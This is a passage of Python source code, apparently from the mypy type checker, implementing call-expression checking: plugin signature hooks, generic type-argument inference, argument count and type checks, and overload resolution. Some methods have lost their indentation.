inferred_ret_type, formal_arg_exprs,
context, self.chk))
    def apply_method_signature_hook(
            self, callee: FunctionLike, args: List[Expression],
            arg_kinds: List[int], context: Context,
            arg_names: Optional[Sequence[Optional[str]]], object_type: Type,
            signature_hook: Callable[[MethodSigContext], CallableType]) -> FunctionLike:
        """Apply a plugin hook that may infer a more precise signature for a method.

        For an overloaded callee, the hook is applied to each overload variant
        separately and the variants are reassembled into a new Overloaded.
        """
        if isinstance(callee, CallableType):
            num_formals = len(callee.arg_kinds)
            formal_to_actual = map_actuals_to_formals(
                arg_kinds, arg_names,
                callee.arg_kinds, callee.arg_names,
                lambda i: self.accept(args[i]))
            # Group actual argument expressions by the formal parameter each
            # one maps to, which is the shape the hook expects.
            formal_arg_exprs = [[] for _ in range(num_formals)]  # type: List[List[Expression]]
            for formal, actuals in enumerate(formal_to_actual):
                for actual in actuals:
                    formal_arg_exprs[formal].append(args[actual])
            return signature_hook(
                MethodSigContext(object_type, formal_arg_exprs, callee, context, self.chk))
        else:
            assert isinstance(callee, Overloaded)
            items = []
            for item in callee.items():
                adjusted = self.apply_method_signature_hook(
                    item, args, arg_kinds, context, arg_names, object_type, signature_hook)
                assert isinstance(adjusted, CallableType)
                items.append(adjusted)
            return Overloaded(items)
def transform_callee_type(
self, callable_name: Optional[str], callee: Type, args: List[Expression],
arg_kinds: List[int], context: Context,
arg_names: Optional[Sequence[Optional[str]]] = None,
object_type: Optional[Type] = None) -> Type:
"""Attempt to determine a more accurate signature for a method call.
This is done by looking up and applying a method signature hook (if one exists for the
given method name).
If no matching method signature hook is found, callee is returned unmodified. The same
happens if the arguments refer to a non-method callable (this is allowed so that the code
calling transform_callee_type needs to perform fewer boilerplate checks).
Note: this method is *not* called automatically as part of check_call, because in some
cases check_call is called multiple times while checking a single call (for example when
dealing with overloads). Instead, this method needs to be called explicitly
(if appropriate) before the signature is passed to check_call.
"""
if (callable_name is not None
and object_type is not None
and isinstance(callee, FunctionLike)):
signature_hook = self.plugin.get_method_signature_hook(callable_name)
if signature_hook:
return self.apply_method_signature_hook(
callee, args, arg_kinds, context, arg_names, object_type, signature_hook)
return callee
def check_call_expr_with_callee_type(self,
callee_type: Type,
e: CallExpr,
callable_name: Optional[str],
object_type: Optional[Type]) -> Type:
"""Type check call expression.
The given callee type overrides the type of the callee
expression.
"""
# Try to refine the call signature using plugin hooks before checking the call.
callee_type = self.transform_callee_type(
callable_name, callee_type, e.args, e.arg_kinds, e, e.arg_names, object_type)
return self.check_call(callee_type, e.args, e.arg_kinds, e,
e.arg_names, callable_node=e.callee,
callable_name=callable_name,
object_type=object_type)[0]
    def check_call(self, callee: Type, args: List[Expression],
                   arg_kinds: List[int], context: Context,
                   arg_names: Optional[Sequence[Optional[str]]] = None,
                   callable_node: Optional[Expression] = None,
                   arg_messages: Optional[MessageBuilder] = None,
                   callable_name: Optional[str] = None,
                   object_type: Optional[Type] = None) -> Tuple[Type, Type]:
        """Type check a call.

        Also infer type arguments if the callee is a generic function.

        Return (result type, inferred callee type).

        Arguments:
            callee: type of the called value
            args: actual argument expressions
            arg_kinds: contains nodes.ARG_* constant for each argument in args
                 describing whether the argument is positional, *arg, etc.
            arg_names: names of arguments (optional)
            callable_node: associate the inferred callable type to this node,
                if specified
            arg_messages: message builder used to report argument errors
                (defaults to self.msg; callers may substitute one to collect
                errors without reporting them)
            callable_name: Fully-qualified name of the function/method to call,
                or None if unavailable (examples: 'builtins.open', 'typing.Mapping.get')
            object_type: If callable_name refers to a method, the type of the object
                on which the method is being called
        """
        arg_messages = arg_messages or self.msg
        if isinstance(callee, CallableType):
            if callable_name is None and callee.name:
                callable_name = callee.name
            if callee.is_type_obj() and isinstance(callee.ret_type, Instance):
                callable_name = callee.ret_type.type.fullname()
            if (isinstance(callable_node, RefExpr)
                and callable_node.fullname in ('enum.Enum', 'enum.IntEnum',
                                               'enum.Flag', 'enum.IntFlag')):
                # An Enum() call that failed SemanticAnalyzerPass2.check_enum_call().
                return callee.ret_type, callee
            if (callee.is_type_obj() and callee.type_object().is_abstract
                    # Exception for Type[...]
                    and not callee.from_type_type
                    and not callee.type_object().fallback_to_any):
                type = callee.type_object()
                self.msg.cannot_instantiate_abstract_class(
                    callee.type_object().name(), type.abstract_attributes,
                    context)
            elif (callee.is_type_obj() and callee.type_object().is_protocol
                  # Exception for Type[...]
                  and not callee.from_type_type):
                self.chk.fail('Cannot instantiate protocol class "{}"'
                              .format(callee.type_object().name()), context)
            formal_to_actual = map_actuals_to_formals(
                arg_kinds, arg_names,
                callee.arg_kinds, callee.arg_names,
                lambda i: self.accept(args[i]))
            if callee.is_generic():
                # Infer values for the callee's type variables, first from the
                # surrounding type context and then from the argument types.
                callee = freshen_function_type_vars(callee)
                callee = self.infer_function_type_arguments_using_context(
                    callee, context)
                callee = self.infer_function_type_arguments(
                    callee, args, arg_kinds, formal_to_actual, context)
            arg_types = self.infer_arg_types_in_context(
                callee, args, arg_kinds, formal_to_actual)
            self.check_argument_count(callee, arg_types, arg_kinds,
                                      arg_names, formal_to_actual, context, self.msg)
            self.check_argument_types(arg_types, arg_kinds, callee, formal_to_actual, context,
                                      messages=arg_messages)
            if (callee.is_type_obj() and (len(arg_types) == 1)
                    and is_equivalent(callee.ret_type, self.named_type('builtins.type'))):
                # One-argument type(x): the result is the type of x.
                callee = callee.copy_modified(ret_type=TypeType.make_normalized(arg_types[0]))
            if callable_node:
                # Store the inferred callable type.
                self.chk.store_type(callable_node, callee)
            if (callable_name
                    and ((object_type is None and self.plugin.get_function_hook(callable_name))
                         or (object_type is not None
                             and self.plugin.get_method_hook(callable_name)))):
                # Let registered plugins refine the inferred return type.
                ret_type = self.apply_function_plugin(
                    arg_types, callee.ret_type, arg_kinds, formal_to_actual,
                    args, len(callee.arg_types), callable_name, object_type, context)
                callee = callee.copy_modified(ret_type=ret_type)
            return callee.ret_type, callee
        elif isinstance(callee, Overloaded):
            arg_types = self.infer_arg_types_in_empty_context(args)
            return self.check_overload_call(callee=callee,
                                            args=args,
                                            arg_types=arg_types,
                                            arg_kinds=arg_kinds,
                                            arg_names=arg_names,
                                            callable_name=callable_name,
                                            object_type=object_type,
                                            context=context,
                                            arg_messages=arg_messages)
        elif isinstance(callee, AnyType) or not self.chk.in_checked_function():
            # Still type check the arguments for their side effects, but the
            # call result is Any.
            self.infer_arg_types_in_empty_context(args)
            if isinstance(callee, AnyType):
                return (AnyType(TypeOfAny.from_another_any, source_any=callee),
                        AnyType(TypeOfAny.from_another_any, source_any=callee))
            else:
                return AnyType(TypeOfAny.special_form), AnyType(TypeOfAny.special_form)
        elif isinstance(callee, UnionType):
            # Check against each union item; the result is the union of the
            # individual result types. Type names are suppressed in messages
            # to avoid repetitive errors.
            self.msg.disable_type_names += 1
            results = [self.check_call(subtype, args, arg_kinds, context, arg_names,
                                       arg_messages=arg_messages)
                       for subtype in callee.relevant_items()]
            self.msg.disable_type_names -= 1
            return (UnionType.make_simplified_union([res[0] for res in results]),
                    callee)
        elif isinstance(callee, Instance):
            # Calling an instance object: dispatch to its __call__ method.
            call_function = analyze_member_access('__call__', callee, context,
                                                  False, False, False, self.named_type,
                                                  self.not_ready_callback, self.msg,
                                                  original_type=callee, chk=self.chk)
            return self.check_call(call_function, args, arg_kinds, context, arg_names,
                                   callable_node, arg_messages)
        elif isinstance(callee, TypeVarType):
            return self.check_call(callee.upper_bound, args, arg_kinds, context, arg_names,
                                   callable_node, arg_messages)
        elif isinstance(callee, TypeType):
            # Pass the original Type[] as context since that's where errors should go.
            item = self.analyze_type_type_callee(callee.item, callee)
            return self.check_call(item, args, arg_kinds, context, arg_names,
                                   callable_node, arg_messages)
        elif isinstance(callee, TupleType):
            return self.check_call(callee.fallback, args, arg_kinds, context,
                                   arg_names, callable_node, arg_messages, callable_name,
                                   object_type)
        else:
            return self.msg.not_callable(callee, context), AnyType(TypeOfAny.from_error)
    def analyze_type_type_callee(self, item: Type, context: Context) -> Type:
        """Analyze the callee X in X(...) where X is Type[item].

        Return a Y that we can pass to check_call(Y, ...).
        """
        if isinstance(item, AnyType):
            return AnyType(TypeOfAny.from_another_any, source_any=item)
        if isinstance(item, Instance):
            res = type_object_type(item.type, self.named_type)
            if isinstance(res, CallableType):
                res = res.copy_modified(from_type_type=True)
            # Substitute the class's type arguments into the constructor
            # signature.
            return expand_type_by_instance(res, item)
        if isinstance(item, UnionType):
            # Analyze each union item independently.
            return UnionType([self.analyze_type_type_callee(tp, context)
                              for tp in item.relevant_items()], item.line)
        if isinstance(item, TypeVarType):
            # Pretend we're calling the typevar's upper bound,
            # i.e. its constructor (a poor approximation for reality,
            # but better than AnyType...), but replace the return type
            # with typevar.
            callee = self.analyze_type_type_callee(item.upper_bound,
                                                   context)  # type: Optional[Type]
            if isinstance(callee, CallableType):
                callee = callee.copy_modified(ret_type=item)
            elif isinstance(callee, Overloaded):
                callee = Overloaded([c.copy_modified(ret_type=item)
                                     for c in callee.items()])
            if callee:
                return callee
        # We support Type of namedtuples but not of tuples in general
        if isinstance(item, TupleType) and item.fallback.type.fullname() != 'builtins.tuple':
            return self.analyze_type_type_callee(item.fallback, context)
        self.msg.unsupported_type_type(item, context)
        return AnyType(TypeOfAny.from_error)
def infer_arg_types_in_empty_context(self, args: List[Expression]) -> List[Type]:
"""Infer argument expression types in an empty context.
In short, we basically recurse on each argument without considering
in what context the argument was called.
"""
res = [] # type: List[Type]
for arg in args:
arg_type = self.accept(arg)
if has_erased_component(arg_type):
res.append(NoneTyp())
else:
res.append(arg_type)
return res
    def infer_arg_types_in_context(
            self, callee: CallableType, args: List[Expression], arg_kinds: List[int],
            formal_to_actual: List[List[int]]) -> List[Type]:
        """Infer argument expression types using a callable type as context.

        For example, if callee argument 2 has type List[int], infer the
        argument expression with List[int] type context.

        Returns the inferred types of *actual arguments*.
        """
        res = [None] * len(args)  # type: List[Optional[Type]]
        for i, actuals in enumerate(formal_to_actual):
            for ai in actuals:
                # *args/**kwargs contents don't get the formal's type as
                # context; they are handled by the fallback pass below.
                if arg_kinds[ai] not in (nodes.ARG_STAR, nodes.ARG_STAR2):
                    res[ai] = self.accept(args[ai], callee.arg_types[i])
        # Fill in the rest of the argument types.
        for i, t in enumerate(res):
            if not t:
                res[i] = self.accept(args[i])
        assert all(tp is not None for tp in res)
        return cast(List[Type], res)
    def infer_function_type_arguments_using_context(
            self, callable: CallableType, error_context: Context) -> CallableType:
        """Unify callable return type to type context to infer type vars.

        For example, if the return type is set[t] where 't' is a type variable
        of callable, and if the context is set[int], return callable modified
        by substituting 't' with 'int'.

        Returns the callable unchanged when there is no type context or the
        context cannot safely constrain the type variables.
        """
        ctx = self.type_context[-1]
        if not ctx:
            return callable
        # The return type may have references to type metavariables that
        # we are inferring right now. We must consider them as indeterminate
        # and they are not potential results; thus we replace them with the
        # special ErasedType type. On the other hand, class type variables are
        # valid results.
        erased_ctx = replace_meta_vars(ctx, ErasedType())
        ret_type = callable.ret_type
        if is_optional(ret_type) and is_optional(ctx):
            # If both the context and the return type are optional, unwrap the optional,
            # since in 99% cases this is what a user expects. In other words, we replace
            #     Optional[T] <: Optional[int]
            # with
            #     T <: int
            # while the former would infer T <: Optional[int].
            ret_type = remove_optional(ret_type)
            erased_ctx = remove_optional(erased_ctx)
            #
            # TODO: Instead of this hack and the one below, we need to use outer and
            #       inner contexts at the same time. This is however not easy because of two
            #       reasons:
            #         * We need to support constraints like [1 <: 2, 2 <: X], i.e. with variables
            #           on both sides. (This is not too hard.)
            #         * We need to update all the inference "infrastructure", so that all
            #           variables in an expression are inferred at the same time.
            #           (And this is hard, also we need to be careful with lambdas that require
            #           two passes.)
        if isinstance(ret_type, TypeVarType) and not is_invariant_instance(ctx):
            # Another special case: the return type is a type variable. If it's unrestricted,
            # we could infer a too general type for the type variable if we use context,
            # and this could result in confusing and spurious type errors elsewhere.
            #
            # Give up and just use function arguments for type inference. As an exception,
            # if the context is an invariant instance type, actually use it as context, as
            # this *seems* to usually be the reasonable thing to do.
            #
            # See also github issues #462 and #360.
            return callable.copy_modified()
        args = infer_type_arguments(callable.type_var_ids(), ret_type, erased_ctx)
        # Only substitute non-Uninhabited and non-erased types.
        new_args = []  # type: List[Optional[Type]]
        for arg in args:
            if has_uninhabited_component(arg) or has_erased_component(arg):
                new_args.append(None)
            else:
                new_args.append(arg)
        # Don't show errors after we have only used the outer context for inference.
        # We will use argument context to infer more variables.
        return self.apply_generic_arguments(callable, new_args, error_context,
                                            skip_unsatisfied=True)
    def infer_function_type_arguments(self, callee_type: CallableType,
                                      args: List[Expression],
                                      arg_kinds: List[int],
                                      formal_to_actual: List[List[int]],
                                      context: Context) -> CallableType:
        """Infer the type arguments for a generic callee type.

        Infer based on the types of arguments.

        Return a derived callable type that has the arguments applied.
        """
        if self.chk.in_checked_function():
            # Disable type errors during type inference. There may be errors
            # due to partial available context information at this time, but
            # these errors can be safely ignored as the arguments will be
            # inferred again later.
            self.msg.disable_errors()
            arg_types = self.infer_arg_types_in_context(
                callee_type, args, arg_kinds, formal_to_actual)
            self.msg.enable_errors()
            arg_pass_nums = self.get_arg_infer_passes(
                callee_type.arg_types, formal_to_actual, len(args))
            # Mask out second-pass arguments (e.g. lambdas) for the first
            # inference pass.
            pass1_args = []  # type: List[Optional[Type]]
            for i, arg in enumerate(arg_types):
                if arg_pass_nums[i] > 1:
                    pass1_args.append(None)
                else:
                    pass1_args.append(arg)
            inferred_args = infer_function_type_arguments(
                callee_type, pass1_args, arg_kinds, formal_to_actual,
                strict=self.chk.in_checked_function())
            if 2 in arg_pass_nums:
                # Second pass of type inference.
                (callee_type,
                 inferred_args) = self.infer_function_type_arguments_pass2(
                    callee_type, args, arg_kinds, formal_to_actual,
                    inferred_args, context)
            if callee_type.special_sig == 'dict' and len(inferred_args) == 2 and (
                    ARG_NAMED in arg_kinds or ARG_STAR2 in arg_kinds):
                # HACK: Infer str key type for dict(...) with keyword args. The type system
                #       can't represent this so we special case it, as this is a pretty common
                #       thing. This doesn't quite work with all possible subclasses of dict
                #       if they shuffle type variables around, as we assume that there is a 1-1
                #       correspondence with dict type variables. This is a marginal issue and
                #       a little tricky to fix so it's left unfixed for now.
                first_arg = inferred_args[0]
                if isinstance(first_arg, (NoneTyp, UninhabitedType)):
                    inferred_args[0] = self.named_type('builtins.str')
                elif not first_arg or not is_subtype(self.named_type('builtins.str'), first_arg):
                    self.msg.fail(messages.KEYWORD_ARGUMENT_REQUIRES_STR_KEY_TYPE,
                                  context)
        else:
            # In dynamically typed functions use implicit 'Any' types for
            # type variables.
            inferred_args = [AnyType(TypeOfAny.unannotated)] * len(callee_type.variables)
        return self.apply_inferred_arguments(callee_type, inferred_args,
                                             context)
    def infer_function_type_arguments_pass2(
            self, callee_type: CallableType,
            args: List[Expression],
            arg_kinds: List[int],
            formal_to_actual: List[List[int]],
            old_inferred_args: Sequence[Optional[Type]],
            context: Context) -> Tuple[CallableType, List[Optional[Type]]]:
        """Perform second pass of generic function type argument inference.

        The second pass is needed for arguments with types such as Callable[[T], S],
        where both T and S are type variables, when the actual argument is a
        lambda with inferred types.  The idea is to infer the type variable T
        in the first pass (based on the types of other arguments).  This lets
        us infer the argument and return type of the lambda expression and
        thus also the type variable S in this second pass.

        Return (the callee with type vars applied, inferred actual arg types).
        """
        # None or erased types in inferred types mean that there was not enough
        # information to infer the argument. Replace them with None values so
        # that they are not applied yet below.
        inferred_args = list(old_inferred_args)
        for i, arg in enumerate(inferred_args):
            if isinstance(arg, (NoneTyp, UninhabitedType)) or has_erased_component(arg):
                inferred_args[i] = None
        # Apply what was inferred in the first pass, then re-infer argument
        # types (now lambdas get usable context) and run inference again.
        callee_type = self.apply_generic_arguments(callee_type, inferred_args, context)
        arg_types = self.infer_arg_types_in_context(
            callee_type, args, arg_kinds, formal_to_actual)
        inferred_args = infer_function_type_arguments(
            callee_type, arg_types, arg_kinds, formal_to_actual)
        return callee_type, inferred_args
def get_arg_infer_passes(self, arg_types: List[Type],
formal_to_actual: List[List[int]],
num_actuals: int) -> List[int]:
"""Return pass numbers for args for two-pass argument type inference.
For each actual, the pass number is either 1 (first pass) or 2 (second
pass).
Two-pass argument type inference primarily lets us infer types of
lambdas more effectively.
"""
res = [1] * num_actuals
for i, arg in enumerate(arg_types):
if arg.accept(ArgInferSecondPassQuery()):
for j in formal_to_actual[i]:
res[j] = 2
return res
def apply_inferred_arguments(self, callee_type: CallableType,
inferred_args: Sequence[Optional[Type]],
context: Context) -> CallableType:
"""Apply inferred values of type arguments to a generic function.
Inferred_args contains the values of function type arguments.
"""
# Report error if some of the variables could not be solved. In that
# case assume that all variables have type Any to avoid extra
# bogus error messages.
for i, inferred_type in enumerate(inferred_args):
if not inferred_type or has_erased_component(inferred_type):
# Could not infer a non-trivial type for a type variable.
self.msg.could_not_infer_type_arguments(
callee_type, i + 1, context)
inferred_args = [AnyType(TypeOfAny.from_error)] * len(inferred_args)
# Apply the inferred types to the function type. In this case the
# return type must be CallableType, since we give the right number of type
# arguments.
return self.apply_generic_arguments(callee_type, inferred_args, context)
    def check_argument_count(self,
                             callee: CallableType,
                             actual_types: List[Type],
                             actual_kinds: List[int],
                             actual_names: Optional[Sequence[Optional[str]]],
                             formal_to_actual: List[List[int]],
                             context: Optional[Context],
                             messages: Optional[MessageBuilder]) -> bool:
        """Check that there is a value for all required arguments to a function.

        Also check that there are no duplicate values for arguments. Report found errors
        using 'messages' if it's not None. If 'messages' is given, 'context' must also be given.

        Return False if there were any errors. Otherwise return True
        """
        if messages:
            assert context, "Internal error: messages given without context"
        elif context is None:
            context = TempNode(AnyType(TypeOfAny.special_form))  # Avoid "is None" checks
        # TODO(jukka): We could return as soon as we find an error if messages is None.
        # Collect list of all actual arguments matched to formal arguments.
        all_actuals = []  # type: List[int]
        for actuals in formal_to_actual:
            all_actuals.extend(actuals)
        ok, is_unexpected_arg_error = self.check_for_extra_actual_arguments(
            callee, actual_types, actual_kinds, actual_names, all_actuals, context, messages)
        # Check for too many or few values for formals.
        for i, kind in enumerate(callee.arg_kinds):
            if kind == nodes.ARG_POS and (not formal_to_actual[i] and
                                          not is_unexpected_arg_error):
                # No actual for a mandatory positional formal.
                if messages:
                    messages.too_few_arguments(callee, context, actual_names)
                ok = False
            elif kind == nodes.ARG_NAMED and (not formal_to_actual[i] and
                                              not is_unexpected_arg_error):
                # No actual for a mandatory named formal
                if messages:
                    argname = callee.arg_names[i]
                    assert argname is not None
                    messages.missing_named_argument(callee, context, argname)
                ok = False
            elif kind in [nodes.ARG_POS, nodes.ARG_OPT,
                          nodes.ARG_NAMED, nodes.ARG_NAMED_OPT] and is_duplicate_mapping(
                    formal_to_actual[i], actual_kinds):
                # A formal received multiple actuals (e.g. both a positional
                # value and a keyword value for the same parameter).
                if (self.chk.in_checked_function() or
                        isinstance(actual_types[formal_to_actual[i][0]], TupleType)):
                    if messages:
                        messages.duplicate_argument_value(callee, i, context)
                    ok = False
            elif (kind in (nodes.ARG_NAMED, nodes.ARG_NAMED_OPT) and formal_to_actual[i] and
                  actual_kinds[formal_to_actual[i][0]] not in [nodes.ARG_NAMED, nodes.ARG_STAR2]):
                # Positional argument when expecting a keyword argument.
                if messages:
                    messages.too_many_positional_arguments(callee, context)
                ok = False
        return ok
    def check_for_extra_actual_arguments(self,
                                         callee: CallableType,
                                         actual_types: List[Type],
                                         actual_kinds: List[int],
                                         actual_names: Optional[Sequence[Optional[str]]],
                                         all_actuals: List[int],
                                         context: Context,
                                         messages: Optional[MessageBuilder]) -> Tuple[bool, bool]:
        """Check for extra actual arguments.

        Return tuple (was everything ok,
                      was there an extra keyword argument error [used to avoid duplicate errors]).
        """
        is_unexpected_arg_error = False  # Keep track of errors to avoid duplicate errors
        ok = True  # False if we've found any error
        for i, kind in enumerate(actual_kinds):
            if i not in all_actuals and (
                    kind != nodes.ARG_STAR or
                    # Empty *args is harmless even without a matching formal.
                    not is_empty_tuple(actual_types[i])):
                # Extra actual: not matched by a formal argument.
                ok = False
                if kind != nodes.ARG_NAMED:
                    if messages:
                        messages.too_many_arguments(callee, context)
                else:
                    if messages:
                        assert actual_names, "Internal error: named kinds without names given"
                        act_name = actual_names[i]
                        assert act_name is not None
                        messages.unexpected_keyword_argument(callee, act_name, context)
                    is_unexpected_arg_error = True
            elif ((kind == nodes.ARG_STAR and nodes.ARG_STAR not in callee.arg_kinds)
                  or kind == nodes.ARG_STAR2):
                actual_type = actual_types[i]
                if isinstance(actual_type, (TupleType, TypedDictType)):
                    if all_actuals.count(i) < len(actual_type.items):
                        # Too many tuple/dict items as some did not match.
                        if messages:
                            if (kind != nodes.ARG_STAR2
                                    or not isinstance(actual_type, TypedDictType)):
                                messages.too_many_arguments(callee, context)
                            else:
                                messages.too_many_arguments_from_typed_dict(callee, actual_type,
                                                                            context)
                                is_unexpected_arg_error = True
                        ok = False
                # *args/**kwargs can be applied even if the function takes a fixed
                # number of positional arguments. This may succeed at runtime.
        return ok, is_unexpected_arg_error
    def check_argument_types(self,
                             arg_types: List[Type],
                             arg_kinds: List[int],
                             callee: CallableType,
                             formal_to_actual: List[List[int]],
                             context: Context,
                             messages: Optional[MessageBuilder] = None,
                             check_arg: Optional[ArgChecker] = None) -> None:
        """Check argument types against a callable type.

        Report errors if the argument types are not compatible.

        'messages' and 'check_arg' default to self.msg and self.check_arg.
        """
        messages = messages or self.msg
        check_arg = check_arg or self.check_arg
        # Keep track of consumed tuple *arg items.
        mapper = ArgTypeExpander()
        for i, actuals in enumerate(formal_to_actual):
            for actual in actuals:
                actual_type = arg_types[actual]
                if actual_type is None:
                    continue  # Some kind of error was already reported.
                actual_kind = arg_kinds[actual]
                # Check that a *arg is valid as varargs.
                if (actual_kind == nodes.ARG_STAR and
                        not self.is_valid_var_arg(actual_type)):
                    messages.invalid_var_arg(actual_type, context)
                if (actual_kind == nodes.ARG_STAR2 and
                        not self.is_valid_keyword_var_arg(actual_type)):
                    is_mapping = is_subtype(actual_type, self.chk.named_type('typing.Mapping'))
                    messages.invalid_keyword_var_arg(actual_type, is_mapping, context)
                # Extract the item actually consumed by this formal when the
                # actual is a starred tuple/dict, then compare against the formal.
                expanded_actual = mapper.expand_actual_type(
                    actual_type, actual_kind,
                    callee.arg_names[i], callee.arg_kinds[i])
                check_arg(expanded_actual, actual_type, arg_kinds[actual],
                          callee.arg_types[i],
                          actual + 1, i + 1, callee, context, messages)
    def check_arg(self, caller_type: Type, original_caller_type: Type,
                  caller_kind: int,
                  callee_type: Type, n: int, m: int, callee: CallableType,
                  context: Context, messages: MessageBuilder) -> None:
        """Check the type of a single argument in a call.

        'n' and 'm' are the 1-based actual and formal argument positions,
        used only for error messages.
        """
        if isinstance(caller_type, DeletedType):
            messages.deleted_as_rvalue(caller_type, context)
        # Only non-abstract non-protocol class can be given where Type[...] is expected...
        elif (isinstance(caller_type, CallableType) and isinstance(callee_type, TypeType) and
              caller_type.is_type_obj() and
              (caller_type.type_object().is_abstract or caller_type.type_object().is_protocol) and
              isinstance(callee_type.item, Instance) and
              (callee_type.item.type.is_abstract or callee_type.item.type.is_protocol)):
            self.msg.concrete_only_call(callee_type, context)
        elif not is_subtype(caller_type, callee_type):
            if self.chk.should_suppress_optional_error([caller_type, callee_type]):
                return
            messages.incompatible_argument(n, m, callee, original_caller_type,
                                           caller_kind, context)
            # When a protocol is involved, add a detailed note explaining which
            # members are missing or incompatible.
            if (isinstance(original_caller_type, (Instance, TupleType, TypedDictType)) and
                    isinstance(callee_type, Instance) and callee_type.type.is_protocol):
                self.msg.report_protocol_problems(original_caller_type, callee_type, context)
            # If the argument has a __call__ member, show its signature to help
            # the user diagnose the callable-vs-instance mismatch.
            if (isinstance(callee_type, CallableType) and
                    isinstance(original_caller_type, Instance)):
                call = find_member('__call__', original_caller_type, original_caller_type)
                if call:
                    self.msg.note_call(original_caller_type, call, context)
    def check_overload_call(self,
                            callee: Overloaded,
                            args: List[Expression],
                            arg_types: List[Type],
                            arg_kinds: List[int],
                            arg_names: Optional[Sequence[Optional[str]]],
                            callable_name: Optional[str],
                            object_type: Optional[Type],
                            context: Context,
                            arg_messages: MessageBuilder) -> Tuple[Type, Type]:
        """Checks a call to an overloaded function.

        Returns (result type, inferred callee type), like check_call.
        """
        # Step 1: Filter call targets to remove ones where the argument counts don't match
        plausible_targets = self.plausible_overload_call_targets(arg_types, arg_kinds,
                                                                 arg_names, callee)
        # Step 2: If the arguments contain a union, we try performing union math first,
        # instead of picking the first matching overload.
        # This is because picking the first overload often ends up being too greedy:
        # for example, when we have a fallback alternative that accepts an unrestricted
        # typevar. See https://github.com/python/mypy/issues/4063 for related discussion.
        erased_targets = None  # type: Optional[List[CallableType]]
        unioned_result = None  # type: Optional[Tuple[Type, Type]]
        union_interrupted = False  # did we try all union combinations?
        if any(self.real_union(arg) for arg in arg_types):
            # Union math errors go into a throwaway builder; they are only
            # reported if this path is the one that wins.
            unioned_errors = arg_messages.clean_copy()
            try:
                unioned_return = self.union_overload_result(plausible_targets, args,
                                                            arg_types, arg_kinds, arg_names,
                                                            callable_name, object_type,
                                                            context,
                                                            arg_messages=unioned_errors)
            except TooManyUnions:
                union_interrupted = True
            else:
                # Record if we succeeded. Next we need to see if maybe normal procedure
                # gives a narrower type.
                if unioned_return:
                    returns, inferred_types = zip(*unioned_return)
                    # Note that we use `combine_function_signatures` instead of just returning
                    # a union of inferred callables because for example a call
                    # Union[int -> int, str -> str](Union[int, str]) is invalid and
                    # we don't want to introduce internal inconsistencies.
                    unioned_result = (UnionType.make_simplified_union(list(returns),
                                                                      context.line,
                                                                      context.column),
                                      self.combine_function_signatures(inferred_types))
        # Step 3: We try checking each branch one-by-one.
        inferred_result = self.infer_overload_return_type(plausible_targets, args, arg_types,
                                                          arg_kinds, arg_names, callable_name,
                                                          object_type, context, arg_messages)
        # If any of checks succeed, stop early.
        if inferred_result is not None and unioned_result is not None:
            # Both unioned and direct checks succeeded, choose the more precise type.
            if (is_subtype(inferred_result[0], unioned_result[0]) and
                    not isinstance(inferred_result[0], AnyType)):
                return inferred_result
            return unioned_result
        elif unioned_result is not None:
            return unioned_result
        elif inferred_result is not None:
            return inferred_result
        # Step 4: Failure. At this point, we know there is no match. We fall back to trying
        #         to find a somewhat plausible overload target using the erased types
        #         so we can produce a nice error message.
        #
        #         For example, suppose the user passes a value of type 'List[str]' into an
        #         overload with signatures f(x: int) -> int and f(x: List[int]) -> List[int].
        #
        #         Neither alternative matches, but we can guess the user probably wants the
        #         second one.
        erased_targets = self.overload_erased_call_targets(plausible_targets, arg_types,
                                                           arg_kinds, arg_names, context)
        # Step 5: We try and infer a second-best alternative if possible. If not, fall back
        #         to using 'Any'.
        if len(erased_targets) > 0:
            # Pick the first plausible erased target as the fallback
            # TODO: Adjust the error message here to make it clear there was no match.
            #       In order to do this, we need to find a clean way of associating
            #       a note with whatever error message 'self.check_call' will generate.
            #       In particular, the note's line and column numbers need to be the same
            #       as the error's.
            target = erased_targets[0]  # type: Type
        else:
            # There was no plausible match: give up
            target = AnyType(TypeOfAny.from_error)
            if not self.chk.should_suppress_optional_error(arg_types):
                arg_messages.no_variant_matches_arguments(
                    plausible_targets, callee, arg_types, context)
        # Re-check against the fallback target so the user gets a concrete error.
        result = self.check_call(target, args, arg_kinds, context, arg_names,
                                 arg_messages=arg_messages,
                                 callable_name=callable_name,
                                 object_type=object_type)
        if union_interrupted:
            self.chk.msg.note("Not all union combinations were tried"
                              " because there are too many unions", context)
        return result
def plausible_overload_call_targets(self,
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
overload: Overloaded) -> List[CallableType]:
"""Returns all overload call targets that having matching argument counts.
If the given args contains a star-arg (*arg or **kwarg argument), this method
will ensure all star-arg overloads appear at the start of the list, instead
of their usual location.
The only exception is if the starred argument is something like a Tuple or a
NamedTuple, which has a definitive "shape". If so, we don't move the corresponding
alternative to the front since we can infer a more precise match using the original
order."""
def has_shape(typ: Type) -> bool:
# TODO: Once https://github.com/python/mypy/issues/5198 is fixed,
# add 'isinstance(typ, TypedDictType)' somewhere below.
return (isinstance(typ, TupleType)
or (isinstance(typ, Instance) and typ.type.is_named_tuple))
matches = [] # type: List[CallableType]
star_matches = [] # type: List[CallableType]
args_have_var_arg = False
args_have_kw_arg = False
for kind, typ in zip(arg_kinds, arg_types):
if kind == ARG_STAR and not has_shape(typ):
args_have_var_arg = True
if kind == ARG_STAR2 and not has_shape(typ):
args_have_kw_arg = True
for typ in overload.items():
formal_to_actual = map_actuals_to_formals(arg_kinds, arg_names,
typ.arg_kinds, typ.arg_names,
lambda i: arg_types[i])
if self.check_argument_count(typ, arg_types, arg_kinds, arg_names,
formal_to_actual, None, None):
if args_have_var_arg and typ.is_var_arg:
star_matches.append(typ)
elif args_have_kw_arg and typ.is_kw_arg:
star_matches.append(typ)
else:
matches.append(typ)
return star_matches + matches
    def infer_overload_return_type(self,
                                   plausible_targets: List[CallableType],
                                   args: List[Expression],
                                   arg_types: List[Type],
                                   arg_kinds: List[int],
                                   arg_names: Optional[Sequence[Optional[str]]],
                                   callable_name: Optional[str],
                                   object_type: Optional[Type],
                                   context: Context,
                                   arg_messages: Optional[MessageBuilder] = None,
                                   ) -> Optional[Tuple[Type, Type]]:
        """Attempts to find the first matching callable from the given list.

        If a match is found, returns a tuple containing the result type and the inferred
        callee type. (This tuple is meant to be eventually returned by check_call.)
        If multiple targets match due to ambiguous Any parameters, returns (AnyType, AnyType).
        If no targets match, returns None.

        Assumes all of the given targets have argument counts compatible with the caller.
        """
        arg_messages = self.msg if arg_messages is None else arg_messages
        matches = []  # type: List[CallableType]
        return_types = []  # type: List[Type]
        inferred_types = []  # type: List[Type]
        args_contain_any = any(map(has_any_type, arg_types))
